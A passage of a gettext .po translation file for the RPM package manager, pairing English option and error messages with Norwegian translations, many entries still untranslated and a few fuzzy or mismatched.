msgid "import an armored public key"
msgstr ""
msgid "don't import, but tell if it would work or not"
msgstr ""
msgid "list keys from RPM keyring"
msgstr ""
msgid "Keyring options:"
msgstr ""
msgid "no arguments given"
msgstr ""
msgid "Query/Verify package selection options:"
msgstr ""
msgid "Query/Verify file selection options:"
msgstr ""
msgid "Query options (with -q or --query):"
msgstr ""
msgid "Verify options (with -V or --verify):"
msgstr ""
msgid "Install/Upgrade/Erase options:"
msgstr ""
msgid "one type of query/verify may be performed at a time"
msgstr "én type spørring/verifisering kan utføres om gangen"
msgid "unexpected query flags"
msgstr "uventede flagg for spørring"
msgid "unexpected query format"
msgstr "ventet spørringsformat"
msgid "unexpected query source"
msgstr "uventet spørringskilde"
msgid "only installation and upgrading may be forced"
msgstr ""
msgid "files may only be relocated during package installation"
msgstr "filer kan kun omplasseres under pakkeinstallasjon"
msgid "cannot use --prefix with --relocate or --excludepath"
msgstr ""
msgid ""
"--relocate and --excludepath may only be used when installing new packages"
msgstr ""
"--relocate og --excludepath kan kun brukes ved installasjon av nye pakker"
msgid "--prefix may only be used when installing new packages"
msgstr "--prefix kan kun brukes ved installasjon av nye pakker"
msgid "arguments to --prefix must begin with a /"
msgstr "argumenter til --prefix må begynne med en /"
msgid ""
"--hash (-h) may only be specified during package installation and erasure"
msgstr ""
msgid "--percent may only be specified during package installation and erasure"
msgstr ""
msgid "--replacepkgs may only be specified during package installation"
msgstr ""
msgid "--excludedocs may only be specified during package installation"
msgstr ""
msgid "--includedocs may only be specified during package installation"
msgstr ""
msgid "only one of --excludedocs and --includedocs may be specified"
msgstr ""
msgid "--ignorearch may only be specified during package installation"
msgstr ""
msgid "--ignoreos may only be specified during package installation"
msgstr ""
msgid "--ignoresize may only be specified during package installation"
msgstr ""
msgid "--allmatches may only be specified during package erasure"
msgstr ""
msgid "--allfiles may only be specified during package installation"
msgstr ""
msgid "--justdb may only be specified during package installation and erasure"
msgstr ""
msgid ""
"script disabling options may only be specified during package installation "
"and erasure"
msgstr ""
"skript som slår av alternativer kan kun spesifiseres under pakkeinstallasjon "
"og sletting"
msgid ""
"trigger disabling options may only be specified during package installation "
"and erasure"
msgstr ""
"alternativer som slår av utløsing kan kun spesifiseres under "
"pakkeinstallasjon, og sletting"
msgid ""
"--nodeps may only be specified during package installation, erasure, and "
"verification"
msgstr ""
msgid "--test may only be specified during package installation and erasure"
msgstr ""
msgid "no packages given for erase"
msgstr ""
msgid "no packages given for install"
msgstr "ingen pakker oppgitt for installering"
msgid "no arguments given for query"
msgstr "ingen argumenter oppgitt for spørring"
msgid "no arguments given for verify"
msgstr "ingen argumenter oppgitt for verifisering"
msgid "sign package(s)"
msgstr ""
msgid "sign package(s) (identical to --addsign)"
msgstr ""
msgid "delete package signatures"
msgstr ""
msgid "create rpm v3 header+payload signatures"
msgstr ""
msgid "sign package(s) files"
msgstr ""
msgid "use file signing key <key>"
msgstr ""
msgid "<key>"
msgstr ""
msgid "prompt for file signing key password"
msgstr ""
msgid "Signature options:"
msgstr ""
#, c-format
msgid "You must set \"%%_gpg_name\" in your macro file\n"
msgstr ""
#, c-format
msgid ""
"You must set \"%%_file_signing_key\" in your macro file or on the command "
"line with --fskpath\n"
msgstr ""
msgid "--fskpath may only be specified when signing files"
msgstr ""
msgid "parse spec file(s) to stdout"
msgstr ""
msgid "query spec file(s)"
msgstr ""
msgid "operate on binary rpms generated by spec (default)"
msgstr ""
msgid "operate on binary rpms that would be built from spec"
msgstr ""
msgid "operate on source rpm generated by spec"
msgstr ""
msgid "use the following query format"
msgstr ""
msgid "Spec options:"
msgstr ""
msgid "no arguments given for parse"
msgstr ""
msgid "unable to parse SOURCE_DATE_EPOCH\n"
msgstr ""
#, c-format
msgid "Could not canonicalize hostname: %s\n"
msgstr ""
#, c-format
msgid "Unable to open temp file: %s\n"
msgstr ""
#, c-format
msgid "Unable to open stream: %s\n"
msgstr ""
#, c-format
msgid "Executing(%s): %s\n"
msgstr "Kjører(%s): %s\n"
#, c-format
msgid "Bad exit status from %s (%s)\n"
msgstr "Ugyldig sluttstatus fra %s (%s)\n"
msgid "Failed build dependencies:\n"
msgstr ""
#, c-format
msgid "setting %s=%s\n"
msgstr ""
msgid ""
"\n"
"\n"
"RPM build errors:\n"
msgstr ""
"\n"
"\n"
"RPM-feil under bygging:\n"
#, c-format
msgid "Missing '(' in %s %s\n"
msgstr "Mangler '(' i %s %s\n"
#, c-format
msgid "Missing ')' in %s(%s\n"
msgstr "Mangler ')' i %s(%s\n"
#, c-format
msgid "Invalid %s token: %s\n"
msgstr "Ugyldig %s-tegn: %s\n"
#, c-format
msgid "Missing %s in %s(%s)\n"
msgstr ""
#, c-format
msgid "Non-white space follows %s(): %s\n"
msgstr ""
#, c-format
msgid "Bad syntax: %s(%s)\n"
msgstr ""
#, c-format
msgid "Bad mode spec: %s(%s)\n"
msgstr ""
#, c-format
msgid "Bad dirmode spec: %s(%s)\n"
msgstr ""
#, c-format
msgid "Unusual locale length: \"%s\" in %%lang(%s)\n"
msgstr ""
#, c-format
msgid "Duplicate locale %s in %%lang(%s)\n"
msgstr ""
#, c-format
msgid "Invalid capability: %s\n"
msgstr ""
msgid "File capability support not built in\n"
msgstr ""
#, c-format
msgid "File must begin with \"/\": %s\n"
msgstr "Filen må begynne med \"/\": %s\n"
#, c-format
msgid "unable to parse %s=%s\n"
msgstr ""
#, c-format
msgid "Unknown file digest algorithm %u, falling back to MD5\n"
msgstr ""
#, c-format
msgid "File listed twice: %s\n"
msgstr "Fil listet to ganger: %s\n"
#, c-format
msgid "reading symlink %s failed: %s\n"
msgstr ""
#, c-format
msgid "absolute symlink: %s -> %s\n"
msgstr ""
#, c-format
msgid "Symlink points to BuildRoot: %s -> %s\n"
msgstr "Symbolsk lenke peker til BuildRoot: %s -> %s\n"
#, c-format
msgid "Illegal character (0x%x) in filename: %s\n"
msgstr ""
#, c-format
msgid "Path is outside buildroot: %s\n"
msgstr ""
#, c-format
msgid "Directory not found: %s\n"
msgstr ""
#, c-format
msgid "File not found: %s\n"
msgstr "Fil ikke funnet: %s\n"
#, c-format
msgid "Not a directory: %s\n"
msgstr ""
#, fuzzy, c-format
msgid "Can't read content of file: %s\n"
msgstr "%s: lesing av manifest feilet: %s\n"
#, c-format
msgid "%s: can't load unknown tag (%d).\n"
msgstr ""
#, c-format
msgid "%s: public key read failed.\n"
msgstr ""
#, c-format
msgid "%s: not an armored public key.\n"
msgstr ""
#, c-format
msgid "%s: failed to encode\n"
msgstr ""
msgid "failed symlink"
msgstr ""
#, c-format
msgid "Duplicate build-id, stat %s: %m\n"
msgstr ""
#, c-format
msgid "Duplicate build-ids %s and %s\n"
msgstr ""
msgid "_build_id_links macro not set, assuming 'compat'\n"
msgstr ""
#, c-format
msgid "_build_id_links macro set to unknown value '%s'\n"
msgstr ""
#, c-format
msgid "error reading build-id in %s: %s\n"
msgstr ""
#, c-format
msgid "Missing build-id in %s\n"
msgstr ""
#, c-format
msgid "build-id found in %s too small\n"
msgstr ""
#, c-format
msgid "build-id found in %s too large\n"
msgstr ""
msgid "failed to create directory"
msgstr ""
msgid "Mixing main ELF and debug files in package"
msgstr ""
#, c-format
msgid "File needs leading \"/\": %s\n"
msgstr ""
#, c-format
msgid "%%dev glob not permitted: %s\n"
msgstr ""
#, c-format
msgid "Directory not found by glob: %s. Trying without globbing.\n"
msgstr ""
#, c-format
msgid "File not found by glob: %s. Trying without globbing.\n"
msgstr ""
#, fuzzy, c-format
msgid "Could not open %s file %s: %m\n"
msgstr "Kunne ikke åpne %s: %s\n"
#, fuzzy, c-format
msgid "Empty %s file %s\n"
msgstr "feil under åpning av %s: %s\n"
#, c-format
msgid "illegal _docdir_fmt %s: %s\n"
msgstr ""
#, c-format
msgid "File not found by glob: %s\n"
msgstr ""
#, c-format
msgid "Special file in generated file list: %s\n"
msgstr ""
#, c-format
msgid "Can't mix special %s with other forms: %s\n"
msgstr ""
#, c-format
msgid "More than one file on a line: %s\n"
msgstr ""
msgid "Generating build-id links failed\n"
msgstr ""
#, c-format
msgid "Bad file: %s: %s\n"
msgstr "Ugyldig fil %s: %s\n"
#, c-format
msgid "Checking for unpackaged file(s): %s\n"
msgstr ""
#, c-format
msgid ""
"Installed (but unpackaged) file(s) found:\n"
"%s"
msgstr ""
#, fuzzy, c-format
msgid "package %s already exists\n"
msgstr "pakke %s er allerede installert"
#, c-format
msgid "%s was mapped to multiple filenames"
msgstr ""
#, c-format
msgid "Processing files: %s\n"
msgstr ""
#, c-format
msgid "Binaries arch (%d) not matching the package arch (%d).\n"
msgstr ""
msgid "Arch dependent binaries in noarch package\n"
msgstr ""
#, c-format
msgid "create archive failed on file %s: %s\n"
msgstr ""
#, c-format
msgid "create archive failed: %s\n"
msgstr ""
#, c-format
msgid "Unknown payload compression: %s\n"
msgstr ""
#, c-format
msgid "Could not seek in file %s: %s\n"
msgstr ""
#, c-format
msgid "Failed to read %jd bytes in file %s: %s\n"
msgstr ""
msgid "Unable to create immutable header region\n"
msgstr ""
#, c-format
msgid "Unable to write header to %s: %s\n"
msgstr ""
#, c-format
msgid "Could not open %s: %s\n"
msgstr "Kunne ikke åpne %s: %s\n"
#, c-format
msgid "Unable to write package: %s\n"
msgstr "Kunne ikke skrive pakke: %s\n"
#, c-format
msgid "Wrote: %s\n"
msgstr "Skrev: %s\n"
#, c-format
msgid "Executing \"%s\":\n"
msgstr ""
#, c-format
msgid "Execution of \"%s\" failed.\n"
msgstr ""
#, c-format
msgid "Package check \"%s\" failed.\n"
msgstr ""
#, c-format
msgid "cannot create %s: %s\n"
msgstr ""
#, c-format
msgid "Could not generate output filename for package %s: %s\n"
msgstr ""
#, c-format
msgid "Finished binary package job, result %d, filename %s\n"
msgstr ""
#, c-format
msgid "line %d: second %s\n"
msgstr ""
#, c-format
msgid "bogus date in %%changelog: %s\n"
msgstr ""
#, c-format
msgid "%%changelog entries must start with *\n"
msgstr ""
#, c-format
msgid "incomplete %%changelog entry\n"
msgstr ""
#, c-format
msgid "bad date in %%changelog: %s\n"
msgstr ""
#, c-format
msgid "%%changelog not in descending chronological order\n"
msgstr ""
#, c-format
msgid "missing name in %%changelog\n"
msgstr ""
#, c-format
msgid "no description in %%changelog\n"
msgstr ""
#, c-format
msgid "line %d: second %%changelog\n"
msgstr ""
#, c-format
msgid "line %d: Error parsing %%description: %s\n"
msgstr ""
#, c-format
msgid "line %d: Bad option %s: %s\n"
msgstr "linje %d: Ugyldig flagg %s: %s\n"
#, c-format
msgid "line %d: Too many names: %s\n"
msgstr ""
#, c-format
msgid "line %d: Error parsing %%files: %s\n"
msgstr "linje %d: Feil under lesing av %%filer: %s\n"
#, c-format
msgid "line %d: multiple %%files for package '%s'\n"
msgstr ""
#, c-format
msgid "line %d: Error parsing %%policies: %s\n"
msgstr ""
#, c-format
msgid "Error parsing tag field: %s\n"
msgstr ""
#, c-format
msgid "line %d: Bad number: %s\n"
msgstr "linje %d: Ugyldig nummer: %s\n"
#, c-format
msgid "line %d: Bad no%s number: %u\n"
msgstr ""
#, c-format
msgid "Downloading %s to %s\n"
msgstr ""
#, c-format
msgid "Couldn't download %s\n"
msgstr ""
#, c-format
msgid "line %d: Bad %s number: %s\n"
msgstr "linje %d: Ugyldig %s-nummer: %s\n"
#, c-format
msgid "%s %d defined multiple times\n"
msgstr ""
#, c-format
msgid "Architecture is excluded: %s\n"
msgstr ""
#, c-format
msgid "Architecture is not included: %s\n"
msgstr ""
#, c-format
msgid "OS is excluded: %s\n"
msgstr ""
#, c-format
msgid "OS is not included: %s\n"
msgstr ""
#, c-format
msgid "%s field must be present in package: %s\n"
msgstr "%s-felt må være tilstede i pakken: %s\n"
#, c-format
msgid "Duplicate %s entries in package: %s\n"
msgstr ""
#, c-format
msgid "Unable to open icon %s: %s\n"
msgstr "Kunne ikke åpne ikon %s: %s\n"
#, c-format
msgid "Unable to read icon %s: %s\n"
msgstr "Kan ikke lese ikon %s: %s\n"
#, c-format
msgid "Unknown icon type: %s\n"
msgstr "Ukjent ikontype: %s\n"
#, c-format
msgid "line %d: Tag takes single token only: %s\n"
msgstr "linje %d: Tagg tar kun et enkelt tegn: %s\n"
#, c-format
msgid "line %d: %s in: %s\n"
msgstr ""
#, c-format
msgid "%s in: %s\n"
msgstr ""
#, c-format
msgid "Illegal char '%c' (0x%x)"
msgstr ""
msgid "Possible unexpanded macro"
msgstr ""
msgid "Illegal sequence \"..\""
msgstr ""
#, c-format
msgid "line %d: Malformed tag: %s\n"
msgstr "linje %d: Feilutformet tagg: %s\n"
#, c-format
msgid "line %d: Empty tag: %s\n"
msgstr "linje %d: Tom tagg: %s\n"
#, c-format
msgid "line %d: Prefixes must not end with \"/\": %s\n"
msgstr "linje %d: Prefiks må ikke slutte på \"/\": %s\n"
#, c-format
msgid "line %d: Docdir must begin with '/': %s\n"
msgstr "linje %d: Docdir må begynne med '/': %s\n"
#, c-format
msgid "line %d: Epoch field must be an unsigned number: %s\n"
msgstr ""
#, c-format
msgid "line %d: Bad %s: qualifiers: %s\n"
msgstr "linje %d: Ugyldig %s: kvalifikatorer: %s\n"
#, c-format
msgid "line %d: Bad BuildArchitecture format: %s\n"
msgstr "linje %d: Ugyldig BuildArchitecture format: %s\n"
#, c-format
msgid "line %d: Duplicate BuildArch entry: %s\n"
msgstr ""
#, c-format
msgid "line %d: Only noarch subpackages are supported: %s\n"
msgstr ""
#, c-format
msgid "Internal error: Bogus tag %d\n"
msgstr "Intern feil: Ugyldig tag %d\n"
#, c-format
msgid "line %d: %s is deprecated: %s\n"
msgstr ""
#, c-format
msgid "Bad package specification: %s\n"
msgstr "Ugyldig pakkespesifikasjon: %s\n"
msgid "Binary rpm package found. Expected spec file!\n"
msgstr ""
#, c-format
msgid "line %d: Unknown tag: %s\n"
msgstr "linje %d: Ukjent tagg: %s\n"
#, c-format
msgid "%%{buildroot} couldn't be empty\n"
msgstr ""
#, c-format
msgid "%%{buildroot} can not be \"/\"\n"
msgstr ""
#, c-format
msgid "Bad source: %s: %s\n"
msgstr "kunne ikke opprette %s: %s\n"
#, c-format
msgid "No patch number %u\n"
msgstr ""
#, c-format
msgid "No source number %u\n"
msgstr ""
#, c-format
msgid "Error parsing %%setup: %s\n"
msgstr "Feil under lesing av %%setup: %s\n"
#, c-format
msgid "line %d: Bad arg to %%setup: %s\n"
msgstr "linje %d: Ugyldig argument til %%setup: %s\n"
#, c-format
msgid "line %d: Bad %%setup option %s: %s\n"
msgstr "linje %d: Ugyldig %%setup flagg %s: %s\n"
#, c-format
msgid "%s: %s: %s\n"
msgstr ""
#, c-format
msgid "Invalid patch number %s: %s\n"
msgstr ""
#, c-format
msgid "line %d: second %%prep\n"
msgstr "linje %d: %%prep for andre gang\n"
msgid "Dependency tokens must begin with alpha-numeric, '_' or '/'"
msgstr ""
msgid "Versioned file name not permitted"
msgstr ""
msgid "No rich dependencies allowed for this type"
msgstr ""
msgid "invalid dependency"
msgstr ""
msgid "Version required"
msgstr ""
msgid "Only package names are allowed in Obsoletes"
msgstr ""
msgid "It's not recommended to have unversioned Obsoletes"
msgstr ""
msgid "It's not recommended to use '>' in Obsoletes"
msgstr ""
msgid "Only absolute paths are allowed in file triggers"
msgstr ""
msgid "Trigger fired by the same package is already defined in spec file"
msgstr ""
#, c-format
msgid "line %d: %s: %s\n"
msgstr ""
#, c-format
msgid "line %d: triggers must have --: %s\n"
msgstr "linje %d: triggere må ha --: %s\n"
#, c-format
msgid "line %d: missing trigger condition: %s\n"
msgstr ""
#, c-format
msgid "line %d: Error parsing %s: %s\n"
msgstr "linje %d: Feil under lesing av %s: %s\n"
#, c-format
msgid "line %d: internal script must end with '>': %s\n"
msgstr ""
#, c-format
msgid "line %d: script program must begin with '/': %s\n"
msgstr "linje %d: skriptprogram må begynne med '/': %s\n"
#, c-format
msgid "line %d: Priorities are allowed only for file triggers : %s\n"
msgstr ""
#, c-format
msgid "line %d: Second %s\n"
msgstr "linje %d: Andre %s\n"
#, c-format
msgid "line %d: unsupported internal script: %s\n"
msgstr ""
#, c-format
msgid "line %d: file trigger condition must begin with '/': %s"
msgstr ""
#, c-format
msgid "line %d: interpreter arguments not allowed in triggers: %s\n"
msgstr ""
#, c-format
msgid "extra tokens at the end of %s directive in line %d: %s\n"
msgstr ""
#, c-format
msgid "Macro expanded in comment on line %d: %s\n"
msgstr ""
#, c-format
msgid "Unable to open %s: %s\n"
msgstr "Kan ikke åpne %s: %s\n"
#, c-format
msgid "%s:%d: Argument expected for %s\n"
msgstr ""
#, c-format
msgid "line %d: Unclosed %%if\n"
msgstr ""
#, c-format
msgid "line %d: unclosed macro or bad line continuation\n"
msgstr ""
#, c-format
msgid "%s: line %d: %s with no %%if\n"
msgstr ""
#, c-format
msgid "%s: line %d: %s after %s\n"
msgstr ""
#, c-format
msgid "%s:%d: bad %s condition: %s\n"
msgstr ""
#, c-format
msgid "%s:%d: malformed %%include statement\n"
msgstr ""
#, c-format
msgid "encoding %s not supported by system\n"
msgstr ""
#, c-format
msgid "Package %s: invalid %s encoding in %s: %s - %s\n"
msgstr ""
#, c-format
msgid "line %d: %%end doesn't take any arguments: %s\n"
msgstr ""
#, c-format
msgid "line %d: %%end not expected here, no section to close: %s\n"
msgstr ""
#, c-format
msgid "line %d doesn't belong to any section: %s\n"
msgstr ""
msgid "No compatible architectures found for build\n"
msgstr "Ingen kompatible arkitekturer funnet for bygging\n"
#, c-format
msgid "Package has no %%description: %s\n"
msgstr "Pakken har ingen %%description: %s\n"
#, c-format
msgid "Policy module '%s' duplicated with overlapping types\n"
msgstr ""
#, c-format
msgid "Base modules '%s' and '%s' have overlapping types\n"
msgstr ""
msgid "Failed to get policies from header\n"
msgstr ""
#, c-format
msgid "%%semodule requires a file path\n"
msgstr ""
#, c-format
msgid "Failed to read policy file: %s\n"
msgstr ""
#, c-format
msgid "Failed to encode policy file: %s\n"
msgstr ""
#, c-format
msgid "Failed to determine a policy name: %s\n"
msgstr ""
#, c-format
msgid ""
"'%s' type given with other types in %%semodule %s. Compacting types to "
"'%s'.\n"
msgstr ""
#, c-format
msgid "Error parsing %s: %s\n"
msgstr ""
#, c-format
msgid "Expecting %%semodule tag: %s\n"
msgstr ""
#, c-format
msgid "Missing module path in line: %s\n"
msgstr ""
#, c-format
msgid "Too many arguments in line: %s\n"
msgstr ""
#, c-format
msgid "Processing policies: %s\n"
msgstr ""
#, c-format
msgid "Ignoring invalid regex %s\n"
msgstr ""
#, c-format
msgid "%s: mime and magic supplied, only mime will be used\n"
msgstr ""
#, c-format
msgid "Couldn't create pipe for %s: %m\n"
msgstr ""
#, c-format
msgid "Couldn't fork %s: %s\n"
msgstr "klarte ikke å åpne %s: %s\n"
#, c-format
msgid "Couldn't exec %s: %s\n"
msgstr "Kunne ikke kjøre %s: %s\n"
#, c-format
msgid "%s failed: %x\n"
msgstr ""
#, c-format
msgid "failed to write all data to %s: %s\n"
msgstr ""
msgid "Empty file classifier\n"
msgstr ""
msgid "No file attributes configured\n"
msgstr ""
#, c-format
msgid "magic_open(0x%x) failed: %s\n"
msgstr ""
#, c-format
msgid "magic_load failed: %s\n"
msgstr ""
#, c-format
msgid "Recognition of file \"%s\" failed: mode %06o %s\n"
msgstr ""
#, c-format
msgid "Finding %s: %s\n"
msgstr ""
#, c-format
msgid "Failed to find %s:\n"
msgstr "Klarte ikke å finne %s:\n"
msgid "Deprecated external dependency generator is used!\n"
msgstr ""
#, c-format
msgid "line %d: %s: package %s does not exist\n"
msgstr ""
#, c-format
msgid "line %d: %s: package %s already exists\n"
msgstr ""
#, c-format
msgid "query of specfile %s failed, can't parse\n"
msgstr ""
#, c-format
msgid "%s error(%d) from %s: %s\n"
msgstr ""
#, c-format
msgid "%s error(%d): %s\n"
msgstr ""
#, c-format
msgid "unrecognized db option: \"%s\" ignored.\n"
msgstr ""
#, c-format
msgid "%s has invalid numeric value, skipped\n"
msgstr ""
#, c-format
msgid "%s has too large or too small long value, skipped\n"
msgstr ""
#, c-format
msgid "%s has too large or too small integer value, skipped\n"
msgstr ""
#, c-format
msgid "cannot get %s lock on %s/%s\n"
msgstr ""
msgid "shared"
msgstr ""
msgid "exclusive"
msgstr ""
#, c-format
msgid "invalid index type %x on %s/%s\n"
msgstr ""
#, c-format
msgid "error(%d) getting \"%s\" records from %s index: %s\n"
msgstr ""
#, c-format
msgid "error(%d) storing record \"%s\" into %s\n"
msgstr ""
#, c-format
msgid "error(%d) removing record \"%s\" from %s\n"
msgstr ""
#, c-format
msgid "error(%d) adding header #%d record\n"
msgstr ""
#, c-format
msgid "error(%d) removing header #%d record\n"
msgstr ""
#, c-format
msgid "error(%d) allocating new package instance\n"
msgstr ""
#, c-format
msgid "Converting database from %s to %s backend\n"
msgstr ""
#, c-format
msgid "Found %s %s database while attempting %s backend: using %s backend.\n"
msgstr ""
msgid "Detected outdated index databases\n"
msgstr ""
msgid "Rebuilding outdated index databases\n"
msgstr ""
#, c-format
msgid "rpmidx: Version mismatch. Expected version: %u. Found version: %u\n"
msgstr ""
#, c-format
msgid "rpmpkg: Version mismatch. Expected version: %u. Found version: %u\n"
msgstr ""
msgid "rpmpkg: detected non-zero blob, trying auto repair\n"
msgstr ""
#, c-format
msgid "rpmxdb: Version mismatch. Expected version: %u. Found version: %u\n"
msgstr ""
#, fuzzy, c-format
msgid "Unable to open sqlite database %s: %s\n"
msgstr "Kunne ikke åpne spec fil %s: %s\n"
#, c-format
msgid "%s is a Delta RPM and cannot be directly installed\n"
msgstr ""
#, c-format
msgid "Unsupported payload (%s) in package %s\n"
msgstr ""
#, c-format
msgid "package %s was already added, skipping %s\n"
msgstr ""
#, c-format
msgid "package %s was already added, replacing with %s\n"
msgstr ""
msgid "(not a blob)"
msgstr ""
msgid "(not a number)"
msgstr ""
msgid "(not a string)"
msgstr ""
msgid "(invalid type)"
msgstr ""
#, c-format
msgid "%c"
msgstr ""
msgid "%a %b %d %Y"
msgstr ""
msgid "(not base64)"
msgstr ""
msgid "(invalid xml type)"
msgstr ""
msgid "(not an OpenPGP signature)"
msgstr ""
#, c-format
msgid "Invalid date %u"
msgstr ""
msgid "normal"
msgstr ""
msgid "replaced"
msgstr ""
msgid "not installed"
msgstr ""
msgid "net shared"
msgstr ""
msgid "wrong color"
msgstr ""
msgid "missing"
msgstr ""
msgid "(unknown)"
msgstr ""
#, c-format
msgid "%s saved as %s\n"
msgstr "%s lagret som %s\n"
#, c-format
msgid "%s created as %s\n"
msgstr "%s opprettet som %s\n"
#, c-format
msgid "%s %s: remove failed: %s\n"
msgstr ""
msgid "directory"
msgstr ""
msgid "file"
msgstr ""
#, c-format
msgid "tag[%d]: BAD, tag %d type %d offset %d count %d len %d"
msgstr ""
msgid "hdr load: BAD"
msgstr ""
msgid "region: no tags"
msgstr ""
#, c-format
msgid "region tag: BAD, tag %d type %d offset %d count %d"
msgstr ""
#, c-format
msgid "region offset: BAD, tag %d type %d offset %d count %d"
msgstr ""
#, c-format
msgid "region trailer: BAD, tag %d type %d offset %d count %d"
msgstr ""
#, c-format
msgid "region %d size: BAD, ril %d il %d rdl %d dl %d"
msgstr ""
#, c-format
msgid "region %d: tag number mismatch il %d ril %d dl %d rdl %d\n"
msgstr ""
#, c-format
msgid "hdr size(%d): BAD, read returned %d"
msgstr ""
msgid "hdr magic: BAD"
msgstr ""
#, c-format
msgid "hdr tags: BAD, no. of tags(%d) out of range"
msgstr ""
#, c-format
msgid "hdr data: BAD, no. of bytes(%d) out of range"
msgstr ""
#, c-format
msgid "hdr blob(%zd): BAD, read returned %d"
msgstr ""
#, c-format
msgid "sigh pad(%zd): BAD, read %zd bytes"
msgstr ""
msgid "signature "
msgstr ""
#, c-format
msgid "blob size(%d): BAD, 8 + 16 * il(%d) + dl(%d)"
msgstr ""
msgid "invalid field width"
msgstr ""
#, c-format
msgid "missing { after %%"
msgstr ""
#, c-format
msgid "missing } after %%{"
msgstr ""
msgid "empty tag format"
msgstr ""
msgid "empty tag name"
msgstr ""
#, c-format
msgid "unknown tag: \"%s\""
msgstr ""
msgid "] expected at end of array"
msgstr ""
msgid "unexpected ]"
msgstr ""
msgid "unexpected }"
msgstr ""
msgid "escaped char expected after \\"
msgstr ""
msgid "? expected in expression"
msgstr ""
msgid "{ expected after ? in expression"
msgstr ""
msgid "} expected in expression"
msgstr ""
msgid ": expected following ? subexpression"
msgstr ""
msgid "{ expected after : in expression"
msgstr ""
msgid "| expected at end of expression"
msgstr ""
msgid "array iterator used with different sized arrays"
msgstr ""
#, c-format
msgid "RPM v3 packages are deprecated: %s\n"
msgstr ""
#, c-format
msgid "failed to load macro file %s\n"
msgstr ""
#, c-format
msgid "arguments to --dbpath must begin with '/'\n"
msgstr ""
#, c-format
msgid ""
"%s: error: more than one --pipe specified (incompatible popt aliases?)\n"
msgstr ""
msgid "predefine MACRO with value EXPR"
msgstr ""
msgid "'MACRO EXPR'"
msgstr ""
msgid "define MACRO with value EXPR"
msgstr ""
msgid "undefine MACRO"
msgstr ""
msgid "MACRO"
msgstr ""
msgid "print macro expansion of EXPR"
msgstr ""
msgid "'EXPR'"
msgstr ""
msgid "Specify target platform"
msgstr ""
msgid "CPU-VENDOR-OS"
msgstr ""
msgid "read <FILE:...> instead of default file(s)"
msgstr ""
msgid "<FILE:...>"
msgstr ""
msgid "load a single macro file"
msgstr ""
msgid "<FILE>"
msgstr ""
msgid "don't enable any plugins"
msgstr ""
msgid "don't verify package digest(s)"
msgstr ""
msgid "don't verify database header(s) when retrieved"
msgstr ""
msgid "don't verify package signature(s)"
msgstr ""
msgid "send stdout to CMD"
msgstr ""
msgid "CMD"
msgstr ""
msgid "use ROOT as top level directory"
msgstr ""
msgid "ROOT"
msgstr ""
msgid "use database in DIRECTORY"
msgstr ""
msgid "DIRECTORY"
msgstr ""
msgid "display known query tags"
msgstr "vis kjente tagger for spørring"
msgid "display final rpmrc and macro configuration"
msgstr "vis endelig rpmrc og makrokonfigurasjon"
msgid "provide less detailed output"
msgstr "gi mindre detaljert info"
msgid "provide more detailed output"
msgstr "gi mer detaljert info"
msgid "print the version of rpm being used"
msgstr "skriv ut hvilken versjon av rpm som brukes"
msgid "debug payload file state machine"
msgstr ""
msgid "debug rpmio I/O"
msgstr "feilsøk rpmio I/U"
msgid "disable user namespace support"
msgstr ""
#, c-format
msgid "%s: option table misconfigured (%d)\n"
msgstr ""
msgid "exclude paths must begin with a /"
msgstr "eksluderingssti må begynne med en /"
msgid "relocations must begin with a /"
msgstr "relokasjoner må begynne med en /"
msgid "relocations must contain a ="
msgstr "relokasjoner må inneholde et ="
msgid "relocations must have a / following the ="
msgstr "relokasjoner må ha et / etter ="
msgid "install all files, even configurations which might otherwise be skipped"
msgstr "installer alle filer, selv konfigurasjoner som ellers kan hoppes over"
msgid ""
"remove all packages which match <package> (normally an error is generated if "
"<package> specified multiple packages)"
msgstr ""
"fjern alle pakker som er lik <pakke> (normalt vil en feil genereres hvis "
"<pakke> spesifiserer flere pakker)"
msgid "relocate files in non-relocatable package"
msgstr ""
msgid "print dependency loops as warning"
msgstr ""
msgid "erase (uninstall) package"
msgstr "slett (avinstaller) pakke"
msgid "<package>+"
msgstr "<pakke>+"
#, fuzzy
msgid "do not install artifacts"
msgstr "ikke installer dokumentasjon"
msgid "do not install configuration files"
msgstr ""
msgid "do not install documentation"
msgstr "ikke installer dokumentasjon"
msgid "skip files with leading component <path> "
msgstr "hopp over filer med innledende komponent <sti> "
msgid "<path>"
msgstr "<sti>"
msgid "short hand for --replacepkgs --replacefiles"
msgstr "forkortning for --replacepkgs --replacefiles"
msgid "upgrade package(s) if already installed"
msgstr "oppgrader pakke(r) hvis allerede installert"
msgid "<packagefile>+"
msgstr "<pakkefil>+"
msgid "print hash marks as package installs (good with -v)"
msgstr "skriv ut skigarder etter som pakken installeres (nyttig med -v)"
msgid "don't verify package architecture"
msgstr "ikke verifiser pakkearkitektur"
msgid "don't verify package operating system"
msgstr "ikke verifiser operativsystem for pakken"
msgid "don't check disk space before installing"
msgstr "ikke sjekk diskplass før installasjon"
msgid "short hand for --ignorepayload --ignoresignature"
msgstr ""
msgid "install documentation"
msgstr "installer dokumentasjon"
msgid "install package(s)"
msgstr ""
msgid "update the database, but do not modify the filesystem"
msgstr "oppdater databasen, men ikke modifiser filsystemet"
msgid "do not verify package dependencies"
msgstr "ikke verifiser pakkeavhengigheter"
msgid "don't verify digest of files"
msgstr ""
msgid "don't verify digest of files (obsolete)"
msgstr ""
msgid "don't install file security contexts"
msgstr ""
msgid "don't install file capabilities"
msgstr ""
msgid "do not reorder package installation to satisfy dependencies"
msgstr "ikke ordne pakkeinstallasjon for å tilfredsstille avhengigheter"
msgid "do not execute package scriptlet(s)"
msgstr "ikke kjør pakkespesifikke skriptlet"
#, c-format
msgid "do not execute %%pre scriptlet (if any)"
msgstr "ikke kjør noen %%pre skriptlet (hvis noen)"
#, c-format
msgid "do not execute %%post scriptlet (if any)"
msgstr "ikke kjør %%post skriptlet (hvis noen)"
#, c-format
msgid "do not execute %%preun scriptlet (if any)"
msgstr "ikke kjør %%preun skriptlet (hvis noen)"
#, c-format
msgid "do not execute %%postun scriptlet (if any)"
msgstr "ikke kjør %%postun skriptlet (hvis noen)"
#, c-format
msgid "do not execute %%pretrans scriptlet (if any)"
msgstr ""
#, c-format
msgid "do not execute %%posttrans scriptlet (if any)"
msgstr ""
msgid "do not execute any scriptlet(s) triggered by this package"
msgstr "Ikke kjør noen skriptlets som utløses av denne pakken"
#, c-format
msgid "do not execute any %%triggerprein scriptlet(s)"
msgstr "ikke kjør %%triggerprein skriptlets"
#, c-format
msgid "do not execute any %%triggerin scriptlet(s)"
msgstr "ikke kjør %%triggerin skriptlets"
#, c-format
